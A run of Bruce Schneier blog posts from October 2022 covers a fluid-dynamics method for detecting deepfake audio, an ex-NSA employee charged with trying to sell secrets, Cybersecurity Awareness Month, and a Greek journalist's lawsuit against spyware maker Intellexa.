<a href="https://www.schneier.com/blog/archives/2022/10/detecting-deepfake-audio-by-modeling-the-human-acoustic-tract.html"><strong>[2022.10.03]</strong></a> This is <a href="https://www.usenix.org/conference/usenixsecurity22/presentation/blue">interesting research</a>: <blockquote>In this paper, we develop a new mechanism for detecting audio deepfakes using techniques from the field of articulatory phonetics. Specifically, we apply fluid dynamics to estimate the arrangement of the human vocal tract during speech generation and show that deepfakes often model impossible or highly-unlikely anatomical arrangements. When parameterized to achieve 99.9% precision, our detection mechanism achieves a recall of 99.5%, correctly identifying all but one deepfake sample in our dataset.</blockquote> From an <a href="https://theconversation.com/deepfake-audio-has-a-tell-researchers-use-fluid-dynamics-to-spot-artificial-imposter-voices-189104">article</a> by two of the researchers: <blockquote>The first step in differentiating speech produced by humans from speech generated by deepfakes is understanding how to acoustically model the vocal tract. Luckily scientists have techniques to estimate what someone—or some being such as a <a href="https://carnegiemnh.org/what-did-dinosaurs-sound-like-paleoacoustics/">dinosaur</a>—would sound like based on anatomical measurements of its vocal tract. We did the reverse. By inverting many of these same techniques, we were able to extract an approximation of a speaker’s vocal tract during a segment of speech. This allowed us to effectively peer into the anatomy of the speaker who created the audio sample. From here, we hypothesized that deepfake audio samples would fail to be constrained by the same anatomical limitations humans have. In other words, the analysis of deepfaked audio samples simulated vocal tract shapes that do not exist in people. Our testing results not only confirmed our hypothesis but revealed something interesting. 
When extracting vocal tract estimations from deepfake audio, we found that the estimations were often comically incorrect. For instance, it was common for deepfake audio to result in vocal tracts with the same relative diameter and consistency as a drinking straw, in contrast to human vocal tracts, which are much wider and more variable in shape.</blockquote> This is, of course, not the last word. Deepfake generators will figure out how to use these techniques to create harder-to-detect fake voices. And the deepfake detectors will figure out another, better, detection technique. And the arms race will continue. Slashdot <a href="https://slashdot.org/story/22/10/01/0048226/researchers-use-fluid-dynamics-to-spot-artificial-imposter-voices">thread</a>.

<h2>NSA Employee Charged with Espionage</h2>

<a href="https://www.schneier.com/blog/archives/2022/10/nsa-employee-charged-with-espionage.html"><strong>[2022.10.04]</strong></a> An ex-NSA employee <a href="https://www.nytimes.com/2022/09/30/us/nsa-espionage-colorado.html">has</a> <a href="https://www.cnn.com/2022/09/29/politics/jareh-sebastian-dalke-nsa-espionage-sell-secrets-charged/index.html">been</a> <a href="https://www.nextgov.com/technology-news/2022/09/nsa-employee-leaked-classified-cyber-intel-charged-espionage/377846/">charged</a> <a href="https://www.cyberscoop.com/nsa-former-employee-espionage/">with</a> trying to sell classified data to the Russians (but instead actually talking to an undercover FBI agent). It’s a weird story, and the FBI <a href="https://www.documentcloud.org/documents/23113211-dalke_affidavit_0">affidavit</a> raises more questions than it answers. The employee only worked for the NSA for three weeks—which is weird in itself. I can’t figure out how he linked up with the undercover FBI agent. It’s not clear how much of this was the employee’s idea, and whether he was goaded by the FBI agent. Still, hooray for not leaking NSA secrets to the Russians. (And, almost ten years after Snowden, do we still have this much trouble vetting people before giving them security clearances?) <blockquote>Mr. Dalke, who had already left the N.S.A. but told the agent that he still worked there on a temporary assignment, then revealed that he had taken “highly sensitive information” related to foreign targeting of U.S. systems and information on cyber operations, the prosecutors said. 
He offered the information in exchange for cryptocurrency and said he was in “financial need.” Court records show he had nearly $84,000 in debt between student loans and credit cards.</blockquote> EDITED TO ADD (10/5): Marcy Wheeler <a href="https://www.emptywheel.net/2022/09/30/fbi-seems-to-be-collecting-offers-to-spy-for-russia/">notes</a> that the FBI seems to be sitting on some common recruitment point, and collecting potential Russian spies.

<h2>October Is Cybersecurity Awareness Month</h2>

<a href="https://www.schneier.com/blog/archives/2022/10/october-is-cybersecurity-awareness-month.html"><strong>[2022.10.05]</strong></a> For the past nineteen years, October has been Cybersecurity Awareness Month here in the US, an event that has always been part advice and part ridicule. I tend to fall on the apathy end of the spectrum; I don’t think I’ve ever mentioned it before. But the memes can be funny. Here’s a <a href="https://www.washingtonpost.com/politics/2022/10/04/dread-sincerity-comedy-cybersecurity-awareness-month/">decent</a> rundown of some of the chatter.

<h2>Spyware Maker Intellexa Sued by Journalist</h2>

<a href="https://www.schneier.com/blog/archives/2022/10/spyware-maker-intellexa-sued-by-journalist.html"><strong>[2022.10.07]</strong></a> The Greek journalist Thanasis Koukakis was spied on by his own government, with a commercial spyware product called “Predator.” That product is sold by a company in North Macedonia called Cytrox, which is in turn owned by an Israeli company called Intellexa. Koukakis is <a href="https://gizmodo.com/thanasis-koukakis-sues-intellexa-over-predator-spyware-1849625793">suing Intellexa</a>. <blockquote>The lawsuit filed by Koukakis takes aim at Intellexa and its executive, alleging a criminal breach of privacy and communication laws, reports <a href="https://www.haaretz.com/world-news/europe/2022-10-06/ty-article/.premium/criminal-allegations-against-israeli-linked-spyware-ex-intel-commander-in-hacking-scandal/00000183-ad14-d3f8-a9ef-bf5752e60000">Haaretz</a>. The founder of Intellexa, a former Israeli intelligence commander named Taj Dilian, is listed as one of the defendants in the suit, as is another shareholder, Sara Hemo, and the firm itself. The objective of the suit, Koukakis says, is to spur an investigation to determine whether a criminal indictment should be brought against the defendants.</blockquote> Why does it always seem to be Israel? The world would be a much safer place if that government stopped this cyberweapons arms trade from inside its borders.